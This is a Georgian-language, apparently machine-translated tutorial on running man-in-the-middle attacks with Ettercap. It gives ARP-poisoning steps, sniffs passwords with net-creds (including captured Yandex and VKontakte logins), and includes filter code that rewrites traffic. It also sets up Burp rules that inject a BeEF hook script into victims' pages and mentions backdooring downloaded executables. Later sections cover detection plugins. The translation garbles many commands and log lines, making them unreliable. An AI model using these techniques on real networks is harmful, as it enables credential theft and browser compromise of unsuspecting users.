ინსტრუქციები Ettercap-ისთვის: შეტევა კაცის შუაგულში (MitM), პაროლის ჩარევა, HSTS შემოვლითი გზა, მონაცემთა ჩანაცვლება, მორგებული ფილტრებისა და დანამატების გამოყენება, BeEF-ის დაკვრა, უკანა კარის ინფექცია. მარტივი ჰაკი: მარტივი ნივთების ჰაკერული საიდუმლოებები ჩარევა

Ettercap-ის ალტერნატივები

Ettercap არის ყველაზე მეტი პოპულარული პროგრამაკაცის შუაგულში შეტევისთვის, მაგრამ არის ეს საუკეთესო? მთელი ინსტრუქციის განმავლობაში ნახავთ, რომ Ettercap თითქმის არასოდეს გამოიყენება მარტო, რომ ერთი ან სხვა პროგრამა ყოველთვის აგებულია მასთან ტრაფიკის დამუშავების ჯაჭვში. შესაძლოა, ეს მატებს მოქნილობას ზოგადად, ეს მიდგომაა UNIX-ის საფუძველი - ერთი პროგრამა ასრულებს ერთ ამოცანას, ხოლო საბოლოო მომხმარებელი აერთიანებს სხვადასხვა პროგრამებს სასურველი შედეგის მისაღწევად. ამ მიდგომით, პროგრამის კოდის შენარჩუნება უფრო ადვილია, ასეთი მინიატურული „აგურიდან“ შეგიძლიათ შექმნათ ნებისმიერი სირთულის და მოქნილობის სისტემა. თუმცა, ხუთი ღია კონსოლის ქონა სხვადასხვა ამოცანებით, რომელთა მუშაობაც პროგრამები მიზნად ისახავს ერთი შედეგის მიღწევას, არც თუ ისე მოსახერხებელია, უბრალოდ უფრო რთულია, არის რაღაც ეტაპზე შეცდომის დაშვების შესაძლებლობა და მთლიანი კონფიგურაცია. სისტემა უშედეგოდ იმუშავებს.

Net-Creds sniff:

  • მონახულებული URL-ები
  • POST მოთხოვნები გაიგზავნა
  • შესვლა/პაროლები HTTP ფორმებიდან
  • შესვლა/პაროლები ძირითადი HTTP ავთენტიფიკაციისთვის
  • HTTP ძიება
  • FTP შესვლა/პაროლები
  • IRC შესვლა/პაროლები
  • POP შესვლა/პაროლები
  • IMAP შესვლა/პაროლები
  • Telnet შესვლა/პაროლები
  • SMTP შესვლა/პაროლები
  • SNMP საზოგადოების სტრიქონი
  • ყველა მხარდაჭერილი NTLMv1/v2 პროტოკოლი, როგორიცაა HTTP, SMB, LDAP და ა.შ.
  • კერბეროსი

ჩაჭრილთა კარგი არჩევანი და დრიფტნეტი ამ მხრივ უფრო მარტივია - ის აჩვენებს მხოლოდ დაჭერილ სურათებს.

გადართეთ თქვენი მანქანა გადამისამართების რეჟიმში.

ექო "1" > /proc/sys/net/ipv4/ip_forward

გაუშვით Ettercap გრაფიკული ინტერფეისით (-G):

Ettercap-G

ახლა აირჩიეთ Hosts, არის ქვეპუნქტი Scan for hosts. სკანირების დასრულების შემდეგ აირჩიეთ მასპინძლების სია:

როგორც Target1, აირჩიეთ როუტერი (დაამატეთ სამიზნე 1-ში), როგორც Target2 აირჩიეთ მოწყობილობა, რომელზეც თავს დაესხმებით (დაამატეთ სამიზნე 2-ში).

მაგრამ აქ შეიძლება წარმოიშვას პირველი შეფერხება, განსაკუთრებით თუ მასპინძლები ბევრია. სხვადასხვა ინსტრუქციებში, მათ შორის ზემოთ წარმოდგენილ ვიდეოში, ავტორები ადიან სამიზნე მანქანაში (ყველას, რატომღაც, იქ აქვს Windows) და ბრძანების გამოყენებით შეხედეთ ამ აპარატის IP-ს. ლოკალური ქსელი. დამეთანხმებით, ეს ვარიანტი მიუღებელია რეალური პირობებისთვის.

თუ სკანირებთ , შეგიძლიათ მიიღოთ დამატებითი ინფორმაცია ჰოსტების შესახებ, უფრო ზუსტად, ქსელის ბარათის მწარმოებლის შესახებ:

Nmap -sn 192.168.1.0/24

თუ მონაცემები ჯერ კიდევ არ არის საკმარისი, მაშინ შეგიძლიათ გააკეთოთ სკანირება OS-ის დასადგენად:

Nmap -O 192.168.1.0/24

როგორც ვხედავთ, მანქანა IP 192.168.1.33 აღმოჩნდა Windows, თუ ეს არ არის ზემოდან ნიშანი, მაშინ რა არის? 😉 ლოლ

ეს არის ის, რასაც ჩვენ ვამატებთ მეორე მიზნად.

ახლა გადადით მენიუს პუნქტში Mitm. აქ აირჩიეთ ARP poisoning... მონიშნეთ ყუთი Sniff დისტანციური კავშირებისთვის.

ვიწყებთ მოსავლის აღებას, ერთ ფანჯარაში ვიწყებთ

წმინდა კრედიტები

მეორეში (ორივე პროგრამის გაშვება შესაძლებელია ოფციების გარეშე)

დრიფტნეტი

მონაცემთა შეგროვება მაშინვე დაიწყო:

მარჯვენა მხარეს დრიფტნეტმა გახსნა კიდევ ერთი ფანჯარა, რომელშიც ნაჩვენებია გადაღებული სურათები. net-creds-ის ფანჯარაში ჩვენ ვხედავთ მონახულებულ საიტებს და ამოღებულ პაროლებს:

1.2 Ettercap + Burp Suite
3. იხილეთ მონაცემები (საიტებზე მონახულებული და დაფიქსირებული პაროლები) Ettercap-ში

View მენიუში გვაქვს წვდომა კავშირების და პროფილების ჩანართებზე. თქვენ ასევე შეგიძლიათ შეამოწმოთ ყუთი Resolve IP მისამართები. კავშირები, რა თქმა უნდა, კავშირებია. Ettercap აგროვებს პროფილებს მეხსიერებაში თითოეული აღმოჩენილი ჰოსტისთვის. იქ გროვდება მომხმარებლები და პაროლები. ამ შემთხვევაში, პროფილები აღებული ანგარიშის მონაცემებით (პაროლები) აღინიშნება ჯვრით:

არ არის საჭირო პროფილებზე ზედმეტად დაყრდნობა - მაგალითად, მონიშნულია FTP-ისა და სხვა სერვისების ჩასმული შესვლა და პაროლები, რისთვისაც პროგრამას შეუძლია ნათლად განმარტოს მიღებული ინფორმაცია, როგორც რწმუნებათა სიგელები. ეს არ მოიცავს, მაგალითად, ავთენტიფიკაციის ძირითად მონაცემებს, შესვლას და პაროლებს, რომლებიც შეყვანილია ვებ ფორმებში.

კავშირებში, ყველაზე პერსპექტიული მონაცემები მონიშნულია ვარსკვლავით:

დეტალების სანახავად შეგიძლიათ ორჯერ დააწკაპუნოთ ამ ჩანაწერებზე:

იმისათვის, რომ არ მოძებნოთ ეს ვარსკვლავები მთელ სიაში, შეგიძლიათ დაალაგოთ ამ ველის მიხედვით და ისინი ყველა გამოჩნდება ზედა ან ბოლოში:

დაჭერილი ძირითადი ავთენტიფიკაცია:

შესვლა-პაროლი Yandex-ისთვის (მონიშნულია ქვემოთ):

ეს არის VKontakte-ს ამოღებული რწმუნებათა სიგელები:

ასევე, ყველაზე საინტერესო მონაცემები გროვდება ქვედა კონსოლში:

თუ გსურთ პროგრამის შედეგების შენახვა, გამოიყენეთ ეს პარამეტრები (მიუთითეთ კლავიშები Ettercap-ის დაწყებისას:

ჟურნალის ვარიანტები: -w, -- ჩაწერეთ დაჭერილი მონაცემები pcapfile-ში -L, --log ჩაწერეთ ყველა ტრაფიკი ამ -l, --log-info ჩაწერეთ მხოლოდ პასიური ინფორმაცია ამ -m, --log-msg ჩაწერეთ ყველა შეტყობინება ამ -c, --შეკუმშვა გამოიყენეთ gzip შეკუმშვა ჟურნალის ფაილებისთვის

4. ფრენის დროს მონაცემთა ჩანაცვლება Ettercap-ში
4.1 Ettercap მორგებული ფილტრების გამოყენება

შენიშვნა: მიუხედავად ყველა ტესტირებისა, Ettercap ფილტრები მაინც არ მუშაობდა ჩემთვის. ძნელი გასაგებია, საქმე ეხება ხელებს, ტექნიკის ფუნქციებს თუ თავად პროგრამაში არსებულ შეცდომას... მაგრამ 0.8.2 ვერსიისთვის (ამჟამად უახლესი), არის შეცდომის ანგარიში ფილტრებთან დაკავშირებული პრობლემების შესახებ. ზოგადად, შეცდომების შესახებ შეტყობინებების და ფორუმების მიხედვით ვიმსჯელებთ, ფილტრები ან ხშირად ცვივა ან საერთოდ არ მუშაობდა დიდი ხნის განმავლობაში. არის ფილიალი, სადაც ცვლილებები განხორციელდა 5 თვის წინ https://github.com/Ettercap/ettercap/tree/filter-improvements, ე.ი. ფილტრის გაუმჯობესება (ფილტრის გაუმჯობესებით). როგორც ამ ფილიალისთვის, ასევე საცავიდან ვერსიისთვის, გაკეთდა მრავალფეროვანი ტესტები, სხვადასხვა პირობებში შემოწმდა სხვადასხვა ფილტრები, დაიხარჯა დიდი დრო, მაგრამ შედეგი არ იყო. სხვათა შორის, დააინსტალირეთ ფილტრის გაუმჯობესების ვერსია Kali Linuxთქვენ უნდა გააკეთოთ ეს:

Sudo apt-get წაშლა ettercap-გრაფიკული ettercap-საერთო sudo apt-მიღება დააინსტალირე git debhelper bison შემოწმება cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libncurses1 libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git კლონი -b filter-გაუმჯობესებები https://github.com/Ettercap/ettercap.git cd ettercap/ mkdir_CSF Buildd =On ../ make sudo make install

ზოგადად, თუ თქვენი ფილტრები არ მუშაობს, მაშინ მარტო არ ხართ. Ettercap-ის შესახებ ინსტრუქციებში მე ვერ გამოვტოვებ ფილტრების თემას, ამიტომ ისინი ნებისმიერ შემთხვევაში განიხილება.

აქამდე ჩვენ ვიყენებდით Ettercap-ს ARP გაყალბებისთვის. ეს ძალიან ზედაპირული აპლიკაციაა. მორგებული ფილტრების წყალობით, ჩვენ შეგვიძლია ჩარევა და ტრაფიკის შეცვლა ფრენის დროს. ფილტრები უნდა იყოს შეტანილი ცალკე ფაილებიდა გამოყენებამდე ისინი უნდა იყოს შედგენილი Etterfilter პროგრამით. მიუხედავად იმისა, რომ დოკუმენტაცია, რომელზეც მოცემულია ბმული, მწირი ჩანს, მაგრამ ქვემოთ მოცემულ მაგალითებთან ერთად, ის საშუალებას მოგცემთ დაწეროთ საკმაოდ საინტერესო ფილტრები.

მოდით შევქმნათ ჩვენი პირველი ფილტრი, ის ჩაანაცვლებს ყველა სურათს ამით:

ფაილში სახელად img_replacer.filter დააკოპირეთ:

If (ip.proto == TCP && tcp.dst == 80) ( if (ძებნა(DATA.data, "Accept-Encoding")) ( change("Accept-Encoding", "Accept-Rubbish!"); # შენიშვნა: შემცვლელი სტრიქონი იგივე სიგრძეა, რაც ორიგინალური msg("zapped Accept-Encoding!\n" ) ) if (ip.proto == TCP && tcp.src == 80) ( replace("src=", " src=\"http://www.irongeek.com/images/jollypwn.png\" "); ჩანაცვლება ("SRC=", "src=\"http://www.irongeek.com/images/jollypwn. png\" "); replace("src =\"http://www.irongeek.com/images/jollypwn.png\" "); http://www.irongeek.com/images/jollypwn.png\" ");

შეადგინეთ ფაილი:

Etterfilter img_replacer.filter -o img_replacer.ef

შედგენის შედეგები:

Etterfilter 0.8.2 საავტორო უფლებები 2001-2015 ETTERCAP განვითარების ჯგუფი 14 პროტოკოლის ცხრილი დატვირთულია: დეკოდირებული მონაცემები UDP TCP ESP GRE ICMP IPv6 IP ARP WiFi Fddi Tr eth 13 მუდმივი დატვირთული: VRRP OSPF GRE UDP TCP ICMP6 ICMP PPPOTE "img_replacer.filter" შესრულებულია.

მეტა-ხის გაშლა შესრულებულია.

ეტიკეტების რეალურ ოფსეტებად გადაქცევა შესრულებულია.

შედეგის ჩაწერა "img_replacer.ef" დასრულდა.

-> სკრიპტი დაშიფრულია 18 ინსტრუქციაში.

-F გადამრთველი ეუბნება პროგრამას, რომ ჩატვირთოს ფილტრი ფაილიდან, რომელიც მოყვება შეცვლას. შედგენის შემდეგ, ჩვენი ახალი ფაილის სახელი ფილტრით არის img_replacer.ef, ამიტომ ბრძანება იღებს ფორმას:

Ettercap -G -F img_replacer.ef

# ტექსტის ჩანაცვლება პაკეტში: if (ip.proto == TCP && search(DATA.data, "lol"))( change("lol", "smh"); msg("ფილტრი გაშვებულია"); ) # ჩვენება შეტყობინება , თუ tcp პორტი არის 22 if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) (msg("SSH packet\n"); ) ) # ჩაწერეთ მთელი telnet ტრაფიკი, ასევე შეასრულეთ ./პროგრამა თითოეული პაკეტისთვის if (ip.proto == TCP) (if (tcp.src == 23 || tcp.dst == 23) (log(DATA.data, "./ logfile.log "); exec("./program"); ​​) ) # ჩაწერეთ ყველა ტრაფიკი, გარდა http if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) (log (DATA.data , "./logfile.log" ) # ზოგიერთი ოპერაცია პაკეტის დატვირთვით, if (DATA.data + 20 == 0x4142) (DATA.data + 20 = 0x4243; ) else ( DATA.data = "შეცვლილია). "; DATA .data + 20 = 0x4445; ) # ჩამოაგდეთ ყველა პაკეტი, რომელიც შეიცავს "ettercap" if (search(DECODED.data, "ettercap")) ( msg("ვიღაც ჩვენზე საუბრობს...\n"); drop( kill( ) # write გაშიფრული ssh პაკეტები, რომლებიც ემთხვევა ნორმალურ გამონათქვამს if (ip.proto == TCP) (if (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # კლავს პაკეტებს, თუ (ip.ttl< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 მონაცემთა ჩანაცვლება Burp-ის გამოყენებით

ჩვენ ვიწყებთ Ettercap-ს და Burp-ს, როგორც ეს აღწერილია 1.2 პუნქტში ან 2.2 პუნქტში.

Burp-ში გადადით პროქსი -> ოფციები. იქ ვიპოვით Match და Replace. დააწკაპუნეთ დამატება ახალი წესის დასამატებლად.

  • მოთხოვნის სათაური არის მოთხოვნის სათაური
  • მოთხოვნის ორგანო - მოთხოვნის ორგანო
  • პასუხის სათაური - პასუხის სათაური
  • საპასუხო ორგანო - საპასუხო ორგანო
  • პარამეტრის სახელის მოთხოვნა - პარამეტრის სახელის მოთხოვნა
  • პარამეტრის მნიშვნელობის მოთხოვნა - პარამეტრის მნიშვნელობის მოთხოვნა
  • მოთხოვნა პირველი ხაზი - მოთხოვნის პირველი ხაზი

თუ თქვენ გჭირდებათ GET მეთოდით გადაცემული მონაცემების შეცვლა, მაშინ ეს ეხება სათაურებს.

IN HTML მარკირებაასევე არსებობს ისეთი რამ, როგორიცაა თავი (head tag). ზემოთ ნახსენებებს ამ სათაურთან საერთო არაფერი აქვთ. ცოტა მაღლა ვსაუბრობთ პაკეტის სათაურებზე. თუ გსურთ შეცვალოთ შინაარსი HTML გვერდები, მაშინ თქვენ ყოველთვის უნდა აირჩიოთ Response body ნაცვლად მოთხოვნა სათაური, მაშინაც კი, თუ თქვენ აპირებთ შეცვალოთ head tag-ის შინაარსი (მაგალითად, სათაური).

თუ არ იცნობთ რეგულარული გამონათქვამები, მაშინ, პრინციპში, სანერვიულო არაფერია: HTML ბევრს აპატიებს და რასაც არ ესმის, ის უბრალოდ უგულებელყოფს - შეგიძლიათ გამოიყენოთ იგი. თუ იცით როგორ გამოიყენოთ რეგულარული გამონათქვამები, მაშინ მე პატივს გცემთ.)))

მაგალითად, შევქმნათ ახალი წესი, შევცვალოთ მოთხოვნის სათაური პასუხის სხეულზე. თავად წესში ჩვენ შევიცვლებით

.*

სათაური არ არის

შეამოწმეთ Regex მატჩის ველი.

ახლა ყველა საიტზე (HTTPS-ის გარეშე) სათაური იქნება No Title:

სხეულის ტეგის შემდეგ ჩადეთ თვითნებური ხაზი (ეს იქნება ტექსტის პირველი ხაზი). მოთხოვნის სათაური შეიცვალა პასუხის სხეულად. ჩვენ ვიცვლით

შეამოწმეთ Regex მატჩის ველი.

ზედა მარჯვენა კუთხეში (დამოკიდებულია განლაგებაზე) ჩნდება წარწერა "მე მაგარი ვარ!" შეგიძლიათ ჩასვათ CSS, JavaScript კოდი, ნებისმიერი ტექსტი - ყველაფერი. თქვენ შეგიძლიათ ზოგადად წაშალოთ ყველაფერი გვერდიდან და შემდეგ შეავსოთ იგი საკუთარი შინაარსით - ეს ყველაფერი დამოკიდებულია თქვენს ფანტაზიაზე.

იდეა იყო თითოეული ფორმის ოდნავ შეცვლა ისე, რომ მონაცემები გადაეგზავნა თავდაპირველ სერვერს და თავდამსხმელის სერვერს (დანერგეთ მრავალჯერადი გაგზავნა თითოეული ფორმისთვის). მაგრამ იმის გათვალისწინებით, რომ თუ გადაცემული მონაცემები არ არის დაშიფრული და ჩვენ გვაქვს მასზე წვდომა, მაშინ ჩვენ უკვე ვხედავთ მას, არ არის საჭირო მისი გაგზავნა რომელიმე სერვერზე. თუმცა, თუ ვინმეს სჭირდება ერთი ფორმიდან მონაცემების ერთდროულად რამდენიმე სერვერზე გაგზავნის ნამდვილად სამუშაო მაგალითი.

5. კავშირი BeEF-ზე

BeEF-ის შესაძლებლობების გამოყენების დასაწყებად, ჩვენ უნდა ჩავსვათ JavaScript ფაილი HTML კოდში, ჩვეულებრივ ხაზში, როგორიცაა:

შემდეგი ორი მეთოდი განსხვავდება მხოლოდ ამ სტრიქონის ჩასმის მეთოდით.

5.1 BeEF-ის დაკავშირება Ettercap ფილტრების გამოყენებით

[განყოფილება მომზადდება მოგვიანებით]

5.2 BeEF-ის შეერთება Burp-ით

თქვენ უნდა დაიწყოთ ზუსტად ისე, როგორც წერია 4.2 პუნქტში. მხოლოდ სათაურების ჩანაცვლებისა და საიტზე ტექსტის დამატების ნაცვლად, ჩვენ განვახორციელებთ JavaScript კოდს ხაზის სახით:

ჩემს შემთხვევაში, ეს ფაილი ხელმისაწვდომია IP 192.168.1.36 პორტზე 3000. ფაილს ჰქვია hook.js (შეიძლება შეიცვალოს პარამეტრებში). იმათ. ჩემს შემთხვევაში მჭირდება ხაზის ინექცია:

ეს შეიძლება გაკეთდეს, მაგალითად, ახალი წესის შექმნით, მოთხოვნის სათაურის შეცვლა პასუხის სხეულზე. ჩანაცვლება უნდა მოხდეს თავად HTML კოდში

შესანიშნავია, როდესაც ხსნით ნებისმიერ ვებსაიტს, რომელსაც არ აქვს HTTPS, JavaScript კოდი ჩასმულია HTML კოდში, რომელიც საშუალებას გაძლევთ შეაგროვოთ ინფორმაცია დამაგრებული ბრაუზერის საშუალებით და განახორციელოთ სხვადასხვა შეტევები:

6. ინფექცია უკანა კარებით

თქვენ შეგიძლიათ შეცვალოთ და დააინფიციროთ შესრულებადი ფაილები Ettercap ფილტრების გამოყენებით [რომლებიც რატომღაც აღარ მუშაობს] და გამოყენებით მესამე მხარის აპლიკაციები. მაგალითად, BDFProxy-ს შეუძლია ამის გაკეთება პირდაპირ ეთერში. სამწუხაროდ, BDFProxy ჯერ კიდევ იბრძვის 2016 წლის აპრილის Backdoor Factory განახლებიდან: libmproxy პაკეტს დაერქვა mitmproxy Python-ში. BDFProxy-სთვის libmproxy პაკეტი არის აუცილებელი დამოკიდებულება ამ პაკეტის გარეშე, პროგრამა არ დაიწყება. ამიტომ, ახლა, BDFProxy-ის „შეკეთებამდე“, მისი გამოყენება შეუძლებელია, რადგან Backdoor Factory-ის დაყენებითაც კი, BDFProxy პროგრამა უჩივის libmproxy ბიბლიოთეკის არარსებობას...

მსგავსი ოპერაცია შეიძლება გაკეთდეს Burp Suite-ით. ნაბიჯ-ნაბიჯ ალგორითმი წარმოდგენილია ამ განყოფილებაში მისი ხელახლა გადაწერას აზრი არ აქვს.

7. Ettercap დანამატების გამოყენება

ინფორმაცია Ettercap დანამატების შესახებ შეგიძლიათ იხილოთ. საკმაოდ ბევრი დანამატია, რაც ქვემოთ აღწერილია, ყველაზე საინტერესოდ მეჩვენება.

პლაგინების დაკავშირება შესაძლებელია Ettercap-ის გაშვებისას, არსებობს ამის ვარიანტი:

P, --მოდული გაუშვით ეს

დანამატები ასევე შეიძლება ჩაიტვირთოს GUI-დან:

[მასალა მომზადების პროცესშია]

7.1 arp_cop

ის აცნობებს საეჭვო ARP აქტივობას ARP მოთხოვნების/პასუხების პასიური მონიტორინგით. მას შეუძლია შეატყობინოს ARP მოწამვლის მცდელობებს ან მარტივი IP კონფლიქტების ან IP ცვლილებების შესახებ. თუ თქვენ ქმნით ჰოსტების თავდაპირველ ჩამონათვალს, დანამატი უფრო ზუსტად იმუშავებს.

Ettercap -TQP arp_cop //

ARP გაყალბების რეალური გამოვლენის მაგალითი:

გაფართოება

Mial@HackWare-Mint ~ $ sudo ettercap -TQP arp_cop // პაროლი mial: ettercap 0.8.2 საავტორო უფლებები 2001-2015 Ettercap განვითარების გუნდი მოსმენა: eth0 -> 08:00:27:A3:08:416/19.2. 255.255.255.0 fe80::a00:27ff:fea3:84a/64 SSL დისექციას სჭირდება მოქმედი "redir_command_on" სკრიპტი etter.conf ფაილში. გამყიდველის თითის ანაბეჭდი 1766 tcp OS თითის ანაბეჭდი 2182 ცნობილი სერვისები 255 ჰოსტის რანდომიზაცია სკანირებისთვის... მთელი ქსელის სკანირება 255 ჰოსტისთვის... * |==================== =============================>

Mial@HackWare-Mint ~ $ sudo ettercap -TQP arp_cop // პაროლი mial: ettercap 0.8.2 საავტორო უფლებები 2001-2015 Ettercap განვითარების გუნდი მოსმენა: eth0 -> 08:00:27:A3:08:416/19.2. 255.255.255.0 fe80::a00:27ff:fea3:84a/64 SSL დისექციას სჭირდება მოქმედი "redir_command_on" სკრიპტი etter.conf ფაილში. გამყიდველის თითის ანაბეჭდი 1766 tcp OS თითის ანაბეჭდი 2182 ცნობილი სერვისები 255 ჰოსტის რანდომიზაცია სკანირებისთვის... მთელი ქსელის სკანირება 255 ჰოსტისთვის... * |==================== =============================>| 100.00 % 3 ჰოსტი დაემატა ჰოსტების სიას... იწყება ერთიანი sniffing... მხოლოდ ტექსტი გააქტიურებულია ინტერფეისი... დააწკაპუნეთ "h"-ზე დახმარებისთვის. ) 192.168.1.1 arp_cop: (გაფრთხილება) 192.168.1.35 პრეტენზია აქვს 192.168.1.1 arp_cop: (გაფრთხილება) 192.168.1.35 პრეტენზია აქვს 192.168.1.1.1 იყოს 192.168.1.1 arp_cop: (გაფრთხილება ) 192.168.1.35 ვითომ 192.168.1.1 arp_cop: (გაფრთხილება) 192.168.1.35 ვითომ 192.168.1.1 arp_cop: (WARNING) 192.168.1p.1.35 192.168.1.35 ვითომ 192.168. 1.1 arp_cop: (გაფრთხილება) 192.168.1.35 პრეტენზია აქვს 192.168.1.1 arp_cop: (გაფრთხილება) 192.168.1.35 ვითომ 192.168.1.1 arp_cop.8 1921.5. 8.1.1 arp_cop: (გაფრთხილება) 192.168 .1.35 პრეტენზიას წარმოადგენს 192.168.1.1 arp_cop: (გაფრთხილება) 192.168.1.35 პრეტენზიას წარმოადგენს 192.168.1.1 arp_cop: (გაფრთხილება) 192.168.1.35 ვითომ 192.168.1.35. 8.1.35 ვითომ 192.168. 1.1 arp_cop: (გაფრთხილება) 192.168.1.35 პრეტენზია აქვს 192.168.1.1 arp_cop: (გაფრთხილება) 192.168.1.35 პრეტენზია აქვს 192.168.1.1 arp_cop.8 1921 .1.1 arp_cop: (გაფრთხილება) 192.168. 1.35 ვითომ 192.168.1.1 arp_cop: (გაფრთხილება) 192.168.1.35 ვითომ 192.168.1.1 arp_cop: (გაფრთხილება) 192.168.1.35 ვითომ 192.168.1.35 192.168.1.35 არის 192.168.1.19. 1.35) პრეტენზია აქვს 192.168.1.1 arp_cop : (გაფრთხილება) 192.168.1.35 პრეტენზია აქვს 192.168.1.1 arp_cop: (გაფრთხილება) 192.168.1.35 პრეტენზიას წარმოადგენს 192.168.1.1 arp_cop: (გაფრთხილება) 192.11.3 გვ: (გაფრთხილება) 192.168.1.35 პრეტენზია იყოს 192.168.1.1 arp_cop: (გაფრთხილება) 192.168.1.35 პრეტენზია აქვს 192.168.1.1 arp_cop: (გაფრთხილება) 192.168.1.35 პრეტენზია აქვს 192.168.1.1.1 იყოს 192. 168.1.1 arp_cop: (გაფრთხილება) 192.168.1.35 პრეტენზია აქვს 192.168.1.1 arp_cop: (გაფრთხილება) 192.168.1.35 არის 192.168.1.1 პრეტენზია 192.168.1.1 arp_cop.2 .168.1.1 arp_cop: ( გაფრთხილების გაფრთხილება) 192.168.1.35 თავს იჩენს 192.168 1.1 arp_cop: (გაფრთხილება) 192.168.1.35 პრეტენზია აქვს 192.168.1.1 arp_cop: (გაფრთხილება) 192.168.1.35 პრეტენზია აქვს 192.168.1.1.35. be 192.168 .1.1 arp_cop: (გაფრთხილება) 192.168. 1.35 ვითომ 192.168.1.1 arp_cop: (გაფრთხილება) 192.168.1.35 ვითომ 192.168.1.1 arp_cop: (WARNING) 192.168.1p.1.3. 192.168) .1.35 ვითომ 192.168. 1.1 .................

7.2 ავტომატური დამატება

ის ავტომატურად დაამატებს ახალ მსხვერპლს, როდესაც ისინი დაუკავშირდებიან ARP მოწამვლის mitm შეტევას. ის ეძებს ARP მოთხოვნებს ლოკალურ ქსელში და აღმოჩენის შემთხვევაში, დანამატი დაამატებს მასპინძელს დაზარალებულთა სიას, თუ სია მითითებულია როგორც TARGET. ჰოსტი ემატება, როდესაც მისგან ჩანს arp მოთხოვნა.

7.3 ჩკ_შხამი

ის ამოწმებს წარმატებულია თუ არა arp etch მოდულები ettercap-ში. ის აგზავნის გაყალბებულ ICMP ექოს პაკეტებს სატყუარას ყველა მსხვერპლს, ხოლო ვითომ თითოეულ მსხვერპლს. მას შეუძლია დაიჭიროს ICMP პასუხი ჩვენი MAC მისამართით, როგორც დანიშნულების ადგილი, რაც ნიშნავს, რომ სატყუარა ორ სამიზნეს შორის წარმატებულია. ის ამოწმებს თითოეული კავშირის ორივე გზას.

7.4 dns_spoof

ეს მოდული წყვეტს DNS მოთხოვნებს და პასუხობს გაყალბებული (ყალბი) პასუხით. თქვენ შეგიძლიათ აირჩიოთ რომელ მისამართზე უნდა უპასუხოს დანამატი etter.dns ფაილის რედაქტირებით. მოდული წყვეტს A, AAAA, PTR, MX, WINS, SRV და TXT მოთხოვნებს. თუ ეს იყო A მოთხოვნა, მაშინ სახელი იძებნება ფაილში და დაბრუნდება IP მისამართი (შეგიძლიათ გამოიყენოთ ველური ნიშნები სახელში).

იგივე ეხება AAAA მოთხოვნებს.

7.5 find_conn

ძალიან მარტივი დანამატი, რომელიც უსმენს ARP მოთხოვნებს, რათა გაჩვენოთ ყველა სამიზნე, რომლებთანაც მასპინძელს სურს კომუნიკაცია. ის ასევე დაგეხმარებათ იპოვოთ მისამართები უცნობ LAN-ებზე.

Ettercap -TQzP find_conn ettercap -TQu -i eth0 -P find_conn

7.6 find_ettercap

ცდილობს ამოიცნოს LAN-ში გაგზავნილი ettercap პაკეტები. ეს შეიძლება სასარგებლო იყოს ვინმეს იდენტიფიცირებისთვის, რომელიც ცდილობს გამოიყენოს ettercap. არ დაეყრდნოთ მას 100%-ით, რადგან ტესტები მუშაობს მხოლოდ კონკრეტულ მიმდევრობებზე/იდენტიფიკაციის ნომრებზე.

7.7 scan_poisoner

შევამოწმებთ თუ არა ვინმე სატყუარას სიის რომელიმე მასპინძელსა და ჩვენს შორის. პირველ რიგში, ის ამოწმებს, აქვს თუ არა სიაში ორ ჰოსტს ერთი და იგივე Mac მისამართი. ეს შეიძლება ნიშნავდეს, რომ ერთ-ერთი მათგანი მეორეზე პრეტენზიით გვწამლავს. მას შეუძლია მრავალი ცრუ პოზიტივის გენერირება პროქსი-არპ გარემოში. თქვენ უნდა შექმნათ მასპინძლების სია ამ შემოწმების შესასრულებლად. ამის შემდეგ, ის უგზავნის icmp echo პაკეტებს სიის თითოეულ ჰოსტს და ამოწმებს, განსხვავდება თუ არა პასუხის წყაროს Mac მისამართი იმ მისამართისგან, რომელიც ჩვენ ამ IP-ით სიაში შევინახეთ. ეს შეიძლება ნიშნავდეს, რომ ვიღაც ატყუებს ამ მასპინძელს, ვითომ რომ აქვს ჩვენი IP მისამართი და გადაგზავნა ჩვენთან მოხვედრილი პაკეტები. თქვენ არ შეგიძლიათ ამ აქტიური ტესტის გაშვება არაშეტევის რეჟიმში.

Ettercap -TQP scan_poisoner //

7.8 search_promisc

